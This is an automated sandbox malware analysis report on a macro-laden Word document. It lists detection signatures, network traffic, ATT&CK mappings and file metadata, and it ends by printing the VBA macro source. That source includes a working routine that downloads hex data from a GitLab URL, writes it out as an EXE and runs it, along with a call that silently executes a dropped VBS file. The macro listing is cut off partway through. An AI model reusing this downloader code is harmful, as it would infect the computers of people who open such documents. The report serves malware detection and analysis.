Windows Analysis Report
q9JZUaS1Gy.doc

Overview

General Information

Sample name: q9JZUaS1Gy.doc
renamed because original name is a hash value
Original sample name: 0f53abadce48014ec8ea5458af9b732ed1ea6d612b54b261a0e60928e36e86f1.doc
Analysis ID: 1590807
MD5: f8de9b2f8b9088be3dda1985fe7b20c3
SHA1: edba0fb7fdd51294bf183a8d7ab8992bb1762ff5
SHA256: 0f53abadce48014ec8ea5458af9b732ed1ea6d612b54b261a0e60928e36e86f1
Tags: app8490744dochko247blackuser-JAMESWT_MHT

Detection

Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Document contains VBA stomped code (only p-code) potentially bypassing AV detection
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with base64 encoded strings
Document contains an embedded VBA with functions possibly related to HTTP operations
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Machine Learning detection for sample
Detected non-DNS traffic on DNS port
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains an embedded VBA which might only executes on specific systems (country or language check)
Document contains embedded VBA macros
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (unknown TCP traffic)

Classification

  • System is w10x64
  • WINWORD.EXE (PID: 3356 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

AV Detection

Source: q9JZUaS1Gy.doc, Virustotal: Detection: 53%
Source: q9JZUaS1Gy.doc, ReversingLabs: Detection: 39%
Source: q9JZUaS1Gy.doc, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll
Source: global traffic, DNS query: name: 15.164.165.52.in-addr.arpa
Source: global traffic, TCP traffic: 192.168.2.5:52557 -> 162.159.36.2:53
Source: global traffic, TCP traffic: 162.159.36.2:53 -> 192.168.2.5:52557
Source: global traffic, TCP traffic: 192.168.2.5:52557 -> 162.159.36.2:53
Source: global traffic, TCP traffic: 162.159.36.2:53 -> 192.168.2.5:52557
Source: global traffic, TCP traffic: 192.168.2.5:52557 -> 162.159.36.2:53
Source: global traffic, TCP traffic: 162.159.36.2:53 -> 192.168.2.5:52557
Source: global traffic, TCP traffic: 192.168.2.5:52557 -> 162.159.36.2:53
Source: global traffic, TCP traffic: 192.168.2.5:52557 -> 162.159.36.2:53
Source: unknown, TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown, TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown, TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown, TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic, DNS traffic detected: DNS query: 15.164.165.52.in-addr.arpa
Source: q9JZUaS1Gy.doc, String found in binary or memory: https://gitlab.com/app8490744/updatesa/-/raw/main/up$
Source: q9JZUaS1Gy.doc, String found in binary or memory: https://gitlab.com/app8490744/updatesa/-/raw/main/up$v

System Summary

Source: q9JZUaS1Gy.doc, OLE, VBA macro line: shell.Run """" & savePath & """", 1, False
Source: q9JZUaS1Gy.doc, OLE, VBA macro line: shell.ShellExecute vbsFilePath, "", "", "open", 0
Source: q9JZUaS1Gy.doc, OLE, VBA macro line: savePath = Environ("USERPROFILE") & "\Documents\example.exe" ' u?ng d?n luu file
Source: q9JZUaS1Gy.doc, OLE, VBA macro line: Set shell = CreateObject("WScript.Shell")
Source: q9JZUaS1Gy.doc, OLE, VBA macro line: Private Declare PtrSafe Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (lpvDest As Any, lpvSource As Any, ByVal cbCopy As LongPtr)
Source: q9JZUaS1Gy.doc, OLE, VBA macro line: Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (lpvDest As Any, lpvSource As Any, ByVal cbCopy As LongPtr)
Source: q9JZUaS1Gy.doc, OLE, VBA macro line: Private Declare PtrSafe Function WideCharToMultiByte Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpDefaultChar As LongPtr, ByVal lpUsedDefaultChar As LongPtr) As Long
Source: q9JZUaS1Gy.doc, OLE, VBA macro line: Private Declare PtrSafe Function MultiByteToWideChar Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As Long) As Long
Source: q9JZUaS1Gy.doc, OLE, VBA macro line: Private Declare PtrSafe Function FormatMessage Lib "kernel32" Alias "FormatMessageA" (ByVal dwFlags As Long, ByVal lpSource As LongPtr, ByVal dwMessageId As Long, ByVal dwLanguageId As Long, ByVal lpBuffer As String, ByVal nSize As Long, ByVal Args As LongPtr) As Long
Source: q9JZUaS1Gy.doc, OLE, VBA macro line: Private Declare Function WideCharToMultiByte Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpDefaultChar As LongPtr, ByVal lpUsedDefaultChar As LongPtr) As Long
Source: q9JZUaS1Gy.doc, OLE, VBA macro line: Private Declare Function MultiByteToWideChar Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As Long) As Long
Source: q9JZUaS1Gy.doc, OLE, VBA macro line: Private Declare Function FormatMessage Lib "kernel32" Alias "FormatMessageA" (ByVal dwFlags As Long, ByVal lpSource As LongPtr, ByVal dwMessageId As Long, ByVal dwLanguageId As Long, ByVal lpBuffer As String, ByVal nSize As Long, ByVal Args As LongPtr) As Long
Source: q9JZUaS1Gy.doc, OLE, VBA macro line: vbsFilePath = Environ("USERPROFILE") & "\Documents\WindowServices.vbs"
Source: q9JZUaS1Gy.doc, OLE, VBA macro line: shell.ShellExecute vbsFilePath, "", "", "open", 0
Source: VBA code instrumentation, OLE, VBA macro: Module Module2, Function DownloadAndRunEXE, String environ: savePath = Environ("USERPROFILE") & "\Documents\example.exe", Name: DownloadAndRunEXE
Source: VBA code instrumentation, OLE, VBA macro: Module Module2, Function DownloadAndRunEXE, String wscript: Set shell = CreateObject("WScript.Shell"), Name: DownloadAndRunEXE
Source: VBA code instrumentation, OLE, VBA macro: Module ViewSession, Function ikwiwiejs_19293_Ade, String environ: vbsFilePath = Environ("USERPROFILE") & "\Documents\WindowServices.vbs", Name: ikwiwiejs_19293_Ade
Source: VBA code instrumentation, OLE, VBA macro: Module ViewSession, Function ikwiwiejs_19293_Ade, String shellexecute: shell.ShellExecute vbsFilePath, "", "", "open", 0, Name: ikwiwiejs_19293_Ade
Source: VBA code instrumentation, OLE, VBA macro: Module Module3, Function pvCryptoAesCtrInit, String ObjectLength
Source: VBA code instrumentation, OLE, VBA macro: Module Module3, Function pvCryptoAesCtrInit, String HashDigestLength
Source: q9JZUaS1Gy.doc, Stream path 'Macros/VBA/Module2' : found possibly 'XMLHttpRequest' functions response, responsetext, status, open, send
Source: VBA code instrumentation, OLE, VBA macro: Module Module2, Function GetDataFromURL, found possibly 'XMLHttpRequest' functions response, responsetext, status, open, send, Name: GetDataFromURL
Source: q9JZUaS1Gy.doc, OLE, VBA macro line: Private Sub Document_Open()
Source: VBA code instrumentation, OLE, VBA macro: Module ksksksksksksks, Function Document_Open, Name: Document_Open
Source: q9JZUaS1Gy.doc, OLE indicator, VBA macros: true
Source: classification engine, Classification label: mal76.expl.evad.winDOC@2/2@1/0
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, File created: C:\Users\user\Desktop\~$JZUaS1Gy.doc
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, File created: C:\Users\user\AppData\Local\Temp\{0E336B0E-187E-4AAD-A00F-3A607CC53344} - OProcSessId.dat
Source: q9JZUaS1Gy.doc, OLE indicator, Word Document stream: true
Source: q9JZUaS1Gy.doc, OLE document summary: title field not present or empty
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, File read: C:\Users\desktop.ini
Source: q9JZUaS1Gy.doc, Virustotal: Detection: 53%
Source: q9JZUaS1Gy.doc, ReversingLabs: Detection: 39%
Source: unknown, Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}\InprocServer32
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, Window found: window name: SysTabControl32
Source: Window Recorder, Window detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, Window detected: Number of UI elements: 13
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, Window detected: Number of UI elements: 13
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll

Data Obfuscation

Source: q9JZUaS1Gy.doc, Stream path 'Macros/VBA/Module3' : High number of GOTO operations
Source: VBA code instrumentation, OLE, VBA macro, High number of GOTO operations: Module Module3, Name: Module3
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: q9JZUaS1Gy.doc, Stream path 'Macros/VBA/Module3' : , ByVal dwLanguageId As Long, ByVal lpBuffer As String, ByVa
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, Process information queried: ProcessInformation

HIPS / PFW / Operating System Protection Evasion

Source: q9JZUaS1Gy.doc, OLE indicator, VBA stomping: true
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information52
Scripting
Valid Accounts2
Exploitation for Client Execution
52
Scripting
1
Process Injection
1
Masquerading
OS Credential Dumping1
Process Discovery
Remote ServicesData from Local System1
Non-Application Layer Protocol
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Obfuscated Files or Information
Boot or Logon Initialization Scripts1
Process Injection
LSASS Memory1
File and Directory Discovery
Remote Desktop ProtocolData from Removable Media11
Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information
Security Account Manager1
System Information Discovery
SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Source | Detection | Scanner | Label
q9JZUaS1Gy.doc | 53% | Virustotal | -
q9JZUaS1Gy.doc | 39% | ReversingLabs | Script-Macro.Trojan.Amphitryon
q9JZUaS1Gy.doc | 100% | Joe Sandbox ML | -

No Antivirus matches

Name | IP | Active | Malicious | Antivirus Detection | Reputation
s-part-0017.t-0009.fb-t-msedge.net | 13.107.253.45 | true | false | - | high
15.164.165.52.in-addr.arpa | unknown | unknown | false | - | high

Name | Source | Malicious | Antivirus Detection | Reputation
https://gitlab.com/app8490744/updatesa/-/raw/main/up$ | q9JZUaS1Gy.doc | false | - | high
https://gitlab.com/app8490744/updatesa/-/raw/main/up$v | q9JZUaS1Gy.doc | false | - | high

No contacted IP infos

Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1590807
Start date and time: 2025-01-14 15:17:53 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 12s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 12
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • GSI enabled (VBA)
  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: q9JZUaS1Gy.doc
renamed because original name is a hash value
Original Sample Name: 0f53abadce48014ec8ea5458af9b732ed1ea6d612b54b261a0e60928e36e86f1.doc
Detection: MAL
Classification: mal76.expl.evad.winDOC@2/2@1/0
Cookbook Comments:
  • Found application associated with file extension: .doc
  • Max analysis timeout: 600s exceeded, the analysis took too long
  • Exclude process from analysis (whitelisted): dllhost.exe, audiodg.exe, sppsvc.exe, UserOOBEBroker.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, WmiPrvSE.exe
          • Excluded IPs from analysis (whitelisted): 52.109.28.46, 52.113.194.132, 52.109.32.7, 20.189.173.6, 2.23.242.162, 2.20.245.225, 2.20.245.216, 52.111.243.43, 52.111.243.41, 52.111.243.42, 52.111.243.40, 40.126.32.72, 13.107.253.45, 4.245.163.56, 23.1.237.91, 20.190.159.4, 52.165.164.15
          • Excluded domains from analysis (whitelisted): azurefd-t-fb-prod.trafficmanager.net, slscr.update.microsoft.com, otelrules.afd.azureedge.net, templatesmetadata.office.net.edgekey.net, osiprod-ukw-buff-azsc-000.ukwest.cloudapp.azure.com, eur.roaming1.live.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, officeclient.microsoft.com, templatesmetadata.office.net, prod.fs.microsoft.com.akadns.net, www.bing.com, ecs.office.com, self-events-data.trafficmanager.net, client.wns.windows.com, ukw-azsc-000.roaming.officeapps.live.com, fs.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, prod1.naturallanguageeditorservice.osi.office.net.akadns.net, e26769.d
          • Report size getting too big, too many NtQueryAttributesFile calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • Report size getting too big, too many NtReadVirtualMemory calls found.
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
          File Type:data
          Category:dropped
          Size (bytes):512
          Entropy (8bit):0.0
          Encrypted:false
          SSDEEP:3::
          MD5:BF619EAC0CDF3F68D496EA9344137E8B
          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
          Malicious:false
          Reputation:high, very likely benign file
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
          File Type:data
          Category:dropped
          Size (bytes):162
          Entropy (8bit):2.6900941889251593
          Encrypted:false
          SSDEEP:3:klt+lllFKyFo+MldlfllsqJQLrCn:7tnBqJQLu
          MD5:C4686FB19BB891691B9FDF8EFB6F98E3
          SHA1:DCBD015C0354C9A0A0EA5E3336484674CCCAB037
          SHA-256:35CB8464AF65648DBC0AF4A454A4785F7E16CA3A3F1FAA357BA8EB489E8FD059
          SHA-512:0570C98FBD9B7BA38F6A8851F9E3676B82544A61C0C5B3D9A2239055F02ADD9648354B525F971A55C1F1E00FC931627EF782F3D7029B73F4AB5F3A058EFDFD8A
          Malicious:false
          Reputation:low
          Preview:.user.................................................a.l.f.o.n.s...`.N......_=..........a.i............................................._=.|&O.}..i......N..=.i
          File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: ADMIN, Template: Normal, Last Saved By: Victim, Revision Number: 27, Name of Creating Application: Microsoft Office Word, Total Editing Time: 29:00, Create Time/Date: Mon Dec 16 06:28:00 2024, Last Saved Time/Date: Mon Dec 16 10:19:00 2024, Number of Pages: 1, Number of Words: 3, Number of Characters: 18, Security: 0
          Entropy (8bit):5.028164721042547
          TrID:
          • Microsoft Word document (32009/1) 54.23%
          • Microsoft Word document (old ver.) (19008/1) 32.20%
          • Generic OLE2 / Multistream Compound File (8008/1) 13.57%
          File name:q9JZUaS1Gy.doc
          File size:103'424 bytes
          MD5:f8de9b2f8b9088be3dda1985fe7b20c3
          SHA1:edba0fb7fdd51294bf183a8d7ab8992bb1762ff5
          SHA256:0f53abadce48014ec8ea5458af9b732ed1ea6d612b54b261a0e60928e36e86f1
          SHA512:1c31f24df1faa858edee44e14e7f7f90f68aa28de23a6debd7e61a99eaf33ae5921f10822a3efc028ea4ba4609f5d616fe050254c16dce19830b4caf4261106f
          SSDEEP:3072:1VKKLjov0/P6PhGi/dB1P1AHyEivubc98UvBuTh:bKj98UvBg
          TLSH:00A31649F181C92EDAD409B64C9BDBFEB3387D06AE44D71732A0B75E2CB27A4C146384
          Icon Hash:35e1cc889a8a8599
          Document Type:OLE
          Number of OLE Files:1
          Has Summary Info:
          Application Name:Microsoft Office Word
          Encrypted Document:False
          Contains Word Document Stream:True
          Contains Workbook/Book Stream:False
          Contains PowerPoint Document Stream:False
          Contains Visio Document Stream:False
          Contains ObjectPool Stream:False
          Flash Objects Count:0
          Contains VBA Macros:True
          Code Page:1252
          Title:
          Subject:
          Author:ADMIN
          Keywords:
          Comments:
          Template:Normal
          Last Saved By:Victim
          Revision Number:27
          Total Edit Time:1740
          Create Time:2024-12-16 06:28:00
          Last Saved Time:2024-12-16 10:19:00
          Number of Pages:1
          Number of Words:3
          Number of Characters:18
          Creating Application:Microsoft Office Word
          Security:0
          Document Code Page:1252
          Number of Lines:1
          Number of Paragraphs:1
          Thumbnail Scaling Desired:False
          Company:
          Contains Dirty Links:False
          Shared Document:False
          Changed Hyperlinks:False
          Application Version:1048576
          General
          Stream Path:Macros/VBA/Module1
          VBA File Name:Module1.bas
          Stream Size:1128
          Attribute VB_Name = "Module1"
          Public Sub CallTestAES()
              Dim kakensooe As New ViewSession
              kakensooe.ikwiwiejs_19293_Ade
              
          End Sub
          
          

          General
          Stream Path:Macros/VBA/Module2
          VBA File Name:Module2.bas
          Stream Size:4972
          Attribute VB_Name = "Module2"
          Option Explicit
          
          ' Function to convert hex to binary (byte array)
          Function HexToBinary(hexString As String) As Byte()
              Dim i As Long
              Dim length As Long
              Dim byteArray() As Byte
          
              length = Len(hexString) \ 2
              ReDim byteArray(length - 1)
          
              For i = 0 To length - 1
                  byteArray(i) = CByte("&H" & Mid(hexString, i * 2 + 1, 2))
              Next i
          
              HexToBinary = byteArray
          End Function
          
          ' Function to download hex data from a URL
          Function GetDataFromURL(url As String) As String
              Dim http As Object
              Set http = CreateObject("MSXML2.XMLHTTP")
          
              On Error Resume Next
              http.Open "GET", url, False
              http.Send
              
              If http.Status = 200 Then
                  GetDataFromURL = http.responseText
              Else
                  GetDataFromURL = ""
              End If
              
              On Error GoTo 0
              Set http = Nothing
          End Function
          
          ' Sub to save an EXE file from the hex data and run it
          Sub DownloadAndRunEXE()
              Dim hexData As String
              Dim binaryData() As Byte
              Dim savePath As String
              Dim fileNum As Integer
              Dim i As Long
          
              ' Step 1: Download hex data from the URL
              hexData = GetDataFromURL("https://gitlab.com/app8490744/updatesa/-/raw/main/up") ' Replace the URL with the actual link
          
              If hexData = "" Then
                  MsgBox "Khng t?i du?c d? li?u t? URL.", vbCritical, "L?i"
                  Exit Sub
              End If
          
              ' Step 2: Convert hex to binary
              binaryData = HexToBinary(hexData)
          
              ' Step 3: Save the data as an EXE file
              savePath = Environ("USERPROFILE") & "\Documents\example.exe" ' File save path
              fileNum = FreeFile
              
              Open savePath For Binary As #fileNum
              For i = LBound(binaryData) To UBound(binaryData)
                  Put #fileNum, , binaryData(i)
              Next i
              Close #fileNum
          
              ' Step 4: Check the file and run it
              If Len(Dir(savePath)) > 0 Then
                  Dim shell As Object
                  Set shell = CreateObject("WScript.Shell")
                  
                  ' Run the EXE file
                  shell.Run """" & savePath & """", 1, False
                  MsgBox "File EXE d du?c t?i v ch?y thnh cng!", vbInformation, "Thnh cng"
              Else
                  MsgBox "Khng th? t?o file EXE.", vbCritical, "L?i"
              End If
          End Sub
          
          

          General
          Stream Path:Macros/VBA/Module3
          VBA File Name:Module3.bas
          Stream Size:48244
          Attribute VB_Name = "Module3"
          '--- mdAesCtr.bas
          Option Explicit
          DefObj A-Z
          
          #Const HasPtrSafe = (VBA7 <> 0) Or (TWINBASIC <> 0)
          
          '=========================================================================
          ' API
          '=========================================================================
          
          #If Win64 Then
              Private Const PTR_SIZE                  As Long = 8
          #Else
              Private Const PTR_SIZE                  As Long = 4
          #End If
          
          #If HasPtrSafe Then
          Private Declare PtrSafe Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (lpvDest As Any, lpvSource As Any, ByVal cbCopy As LongPtr)
          Private Declare PtrSafe Function ArrPtr Lib "vbe7" Alias "VarPtr" (Ptr() As Any) As LongPtr
          Private Declare PtrSafe Function htonl Lib "ws2_32" (ByVal hostlong As Long) As Long
          Private Declare PtrSafe Function RtlGenRandom Lib "advapi32" Alias "SystemFunction036" (RandomBuffer As Any, ByVal RandomBufferLength As Long) As Long
          '--- bcrypt
          Private Declare PtrSafe Function BCryptOpenAlgorithmProvider Lib "bcrypt" (phAlgorithm As LongPtr, ByVal pszAlgId As LongPtr, ByVal pszImplementation As LongPtr, ByVal dwFlags As Long) As Long
          Private Declare PtrSafe Function BCryptCloseAlgorithmProvider Lib "bcrypt" (ByVal hAlgorithm As LongPtr, ByVal dwFlags As Long) As Long
          Private Declare PtrSafe Function BCryptGetProperty Lib "bcrypt" (ByVal hObject As LongPtr, ByVal pszProperty As LongPtr, pbOutput As Any, ByVal cbOutput As Long, cbResult As Long, ByVal dwFlags As Long) As Long
          Private Declare PtrSafe Function BCryptSetProperty Lib "bcrypt" (ByVal hObject As LongPtr, ByVal pszProperty As LongPtr, ByVal pbInput As LongPtr, ByVal cbInput As Long, ByVal dwFlags As Long) As Long
          Private Declare PtrSafe Function BCryptGenerateSymmetricKey Lib "bcrypt" (ByVal hAlgorithm As LongPtr, phKey As LongPtr, pbKeyObject As Any, ByVal cbKeyObject As Long, pbSecret As Any, ByVal cbSecret As Long, ByVal dwFlags As Long) As Long
          Private Declare PtrSafe Function BCryptDestroyKey Lib "bcrypt" (ByVal hKey As LongPtr) As Long
          Private Declare PtrSafe Function BCryptEncrypt Lib "bcrypt" (ByVal hKey As LongPtr, pbInput As Any, ByVal cbInput As Long, ByVal pPaddingInfo As LongPtr, ByVal pbIV As LongPtr, ByVal cbIV As Long, pbOutput As Any, ByVal cbOutput As Long, pcbResult As Long, ByVal dwFlags As Long) As Long
          Private Declare PtrSafe Function BCryptDeriveKeyPBKDF2 Lib "bcrypt" (ByVal hPrf As LongPtr, pbPassword As Any, ByVal cbPassword As Long, pbSalt As Any, ByVal cbSalt As Long, ByVal cIterations As Currency, pbDerivedKey As Any, ByVal cbDerivedKey As Long, ByVal dwFlags As Long) As Long
          Private Declare PtrSafe Function BCryptCreateHash Lib "bcrypt" (ByVal hAlgorithm As LongPtr, phHash As LongPtr, ByVal pbHashObject As LongPtr, ByVal cbHashObject As Long, pbSecret As Any, ByVal cbSecret As Long, ByVal dwFlags As Long) As Long
          Private Declare PtrSafe Function BCryptDestroyHash Lib "bcrypt" (ByVal hHash As LongPtr) As Long
          Private Declare PtrSafe Function BCryptHashData Lib "bcrypt" (ByVal hHash As LongPtr, pbInput As Any, ByVal cbInput As Long, ByVal dwFlags As Long) As Long
          Private Declare PtrSafe Function BCryptFinishHash Lib "bcrypt" (ByVal hHash As LongPtr, pbOutput As Any, ByVal cbOutput As Long, ByVal dwFlags As Long) As Long
          #Else
          Private Enum LongPtr
              [_]
          End Enum
          Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (lpvDest As Any, lpvSource As Any, ByVal cbCopy As LongPtr)
          Private Declare Function ArrPtr Lib "msvbvm60" Alias "VarPtr" (Ptr() As Any) As LongPtr
          Private Declare Function htonl Lib "ws2_32" (ByVal hostlong As Long) As Long
          Private Declare Function RtlGenRandom Lib "advapi32" Alias "SystemFunction036" (RandomBuffer As Any, ByVal RandomBufferLength As Long) As Long
          '--- bcrypt
          Private Declare Function BCryptOpenAlgorithmProvider Lib "bcrypt" (phAlgorithm As LongPtr, ByVal pszAlgId As LongPtr, ByVal pszImplementation As LongPtr, ByVal dwFlags As Long) As Long
          Private Declare Function BCryptCloseAlgorithmProvider Lib "bcrypt" (ByVal hAlgorithm As LongPtr, ByVal dwFlags As Long) As Long
          Private Declare Function BCryptGetProperty Lib "bcrypt" (ByVal hObject As LongPtr, ByVal pszProperty As LongPtr, pbOutput As Any, ByVal cbOutput As Long, cbResult As Long, ByVal dwFlags As Long) As Long
          Private Declare Function BCryptSetProperty Lib "bcrypt" (ByVal hObject As LongPtr, ByVal pszProperty As LongPtr, ByVal pbInput As LongPtr, ByVal cbInput As Long, ByVal dwFlags As Long) As Long
          Private Declare Function BCryptGenerateSymmetricKey Lib "bcrypt" (ByVal hAlgorithm As LongPtr, phKey As LongPtr, pbKeyObject As Any, ByVal cbKeyObject As Long, pbSecret As Any, ByVal cbSecret As Long, ByVal dwFlags As Long) As Long
          Private Declare Function BCryptDestroyKey Lib "bcrypt" (ByVal hKey As LongPtr) As Long
          Private Declare Function BCryptEncrypt Lib "bcrypt" (ByVal hKey As LongPtr, pbInput As Any, ByVal cbInput As Long, ByVal pPaddingInfo As LongPtr, ByVal pbIV As LongPtr, ByVal cbIV As Long, pbOutput As Any, ByVal cbOutput As Long, pcbResult As Long, ByVal dwFlags As Long) As Long
          Private Declare Function BCryptDeriveKeyPBKDF2 Lib "bcrypt" (ByVal hPrf As LongPtr, pbPassword As Any, ByVal cbPassword As Long, pbSalt As Any, ByVal cbSalt As Long, ByVal cIterations As Currency, pbDerivedKey As Any, ByVal cbDerivedKey As Long, ByVal dwFlags As Long) As Long
          Private Declare Function BCryptCreateHash Lib "bcrypt" (ByVal hAlgorithm As LongPtr, phHash As LongPtr, ByVal pbHashObject As LongPtr, ByVal cbHashObject As Long, pbSecret As Any, ByVal cbSecret As Long, ByVal dwFlags As Long) As Long
          Private Declare Function BCryptDestroyHash Lib "bcrypt" (ByVal hHash As LongPtr) As Long
          Private Declare Function BCryptHashData Lib "bcrypt" (ByVal hHash As LongPtr, pbInput As Any, ByVal cbInput As Long, ByVal dwFlags As Long) As Long
          Private Declare Function BCryptFinishHash Lib "bcrypt" (ByVal hHash As LongPtr, pbOutput As Any, ByVal cbOutput As Long, ByVal dwFlags As Long) As Long
          #End If
          #If Not ImplUseShared Then
              #If HasPtrSafe Then
              Private Declare PtrSafe Function CryptStringToBinary Lib "crypt32" Alias "CryptStringToBinaryW" (ByVal pszString As LongPtr, ByVal cchString As Long, ByVal dwFlags As Long, ByVal pbBinary As LongPtr, pcbBinary As Long, pdwSkip As Long, pdwFlags As Long) As Long
              Private Declare PtrSafe Function CryptBinaryToString Lib "crypt32" Alias "CryptBinaryToStringW" (ByVal pbBinary As LongPtr, ByVal cbBinary As Long, ByVal dwFlags As Long, ByVal pszString As LongPtr, pcchString As Long) As Long
              Private Declare PtrSafe Function WideCharToMultiByte Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpDefaultChar As LongPtr, ByVal lpUsedDefaultChar As LongPtr) As Long
              Private Declare PtrSafe Function MultiByteToWideChar Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As Long) As Long
              Private Declare PtrSafe Function FormatMessage Lib "kernel32" Alias "FormatMessageA" (ByVal dwFlags As Long, ByVal lpSource As LongPtr, ByVal dwMessageId As Long, ByVal dwLanguageId As Long, ByVal lpBuffer As String, ByVal nSize As Long, ByVal Args As LongPtr) As Long
              #Else
              Private Declare Function CryptStringToBinary Lib "crypt32" Alias "CryptStringToBinaryW" (ByVal pszString As LongPtr, ByVal cchString As Long, ByVal dwFlags As Long, ByVal pbBinary As LongPtr, pcbBinary As Long, pdwSkip As Long, pdwFlags As Long) As Long
              Private Declare Function CryptBinaryToString Lib "crypt32" Alias "CryptBinaryToStringW" (ByVal pbBinary As LongPtr, ByVal cbBinary As Long, ByVal dwFlags As Long, ByVal pszString As LongPtr, pcchString As Long) As Long
